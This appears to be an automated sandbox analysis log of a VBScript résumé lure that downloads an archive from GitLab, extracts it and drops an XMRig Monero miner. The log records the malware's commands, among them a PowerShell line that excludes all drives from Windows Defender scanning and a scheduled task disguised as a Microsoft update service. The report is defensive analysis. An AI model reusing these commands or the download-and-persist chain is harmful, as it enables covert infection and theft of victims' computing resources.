Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0 |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0 |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0 |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0 |
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461282573.000001ADB85CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462864277.000001ADB85CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | String found in binary or memory: http://www.nirsoft.net/ |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462657412.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://collector.prd-278964.gl-product-analytics.com |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://customers.gitlab.com |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com |
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB8589000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB8588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB8579000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/ |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/sandbox/ |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/sandbox/; |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/speedscope/index.html |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/admin/ |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/assets/ |
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/calls |
Source: wscript.exe, 00000004.00000003.2113791813.000001ADB81F8000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false |
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false& |
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false.IE5 |
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseO |
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseP |
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseY |
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsen |
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsex |
Source: 7g.exe, 0000000B.00000003.2417873855.0000000001490000.00000004.00001000.00020000.00000000.sdmp, sarmat.vbs.11.dr | String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false |
Source: wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/t |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sentry.gitlab.net |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://snowplow.trx.gitlab.net |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sourcegraph.com |
Source: wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/ |
Source: wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/;K |
Source: wscript.exe, 00000004.00000003.2113791813.000001ADB81F8000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs | String found in binary or memory: https://www.7-zip.org/a/7zr.exe |
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.execal |
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.exel |
Source: wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.7-zip.org/a/7zr.exey |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/ |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html |
Source: wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/ |
Source: wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.recaptcha.net/ |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr | String found in binary or memory: https://xmrig.com/docs/algorithms |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr | String found in binary or memory: https://xmrig.com/wizard |
Source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr | String found in binary or memory: https://xmrig.com/wizard%s |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A13FD5 | 11_2_00A13FD5 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A381E0 | 11_2_00A381E0 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A341C8 | 11_2_00A341C8 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3C360 | 11_2_00A3C360 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A2C350 | 11_2_00A2C350 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A2C4B0 | 11_2_00A2C4B0 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009E8519 | 11_2_009E8519 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A4253A | 11_2_00A4253A |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009FE6A7 | 11_2_009FE6A7 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A42621 | 11_2_00A42621 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A1C88D | 11_2_00A1C88D |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009EA87C | 11_2_009EA87C |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A2A9C0 | 11_2_00A2A9C0 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3E960 | 11_2_00A3E960 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A26A00 | 11_2_00A26A00 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009EAA45 | 11_2_009EAA45 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3EB39 | 11_2_00A3EB39 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A34B00 | 11_2_00A34B00 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009ECDBD | 11_2_009ECDBD |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A30D89 | 11_2_00A30D89 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A34E20 | 11_2_00A34E20 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A330A0 | 11_2_00A330A0 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A33120 | 11_2_00A33120 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A39160 | 11_2_00A39160 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A37220 | 11_2_00A37220 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3D260 | 11_2_00A3D260 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A35250 | 11_2_00A35250 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A313A0 | 11_2_00A313A0 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009D53C8 | 11_2_009D53C8 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A41320 | 11_2_00A41320 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3D410 | 11_2_00A3D410 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A19416 | 11_2_00A19416 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009D947F | 11_2_009D947F |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009D15BB | 11_2_009D15BB |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A2B540 | 11_2_00A2B540 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A3D980 | 11_2_00A3D980 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A2B930 | 11_2_00A2B930 |
Source: C:\Users\Public\7g.exe | Code function: 11_2_009D1AEA | 11_2_009D1AEA |
Source: C:\Users\Public\7g.exe | Code function: 11_2_00A1FB46 | 11_2_00A1FB46 |
Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 21.0.mservice.exe.7ff7bd440000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/ |
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger'); |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0 |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" | |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z | |
Source: C:\Users\Public\7g.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
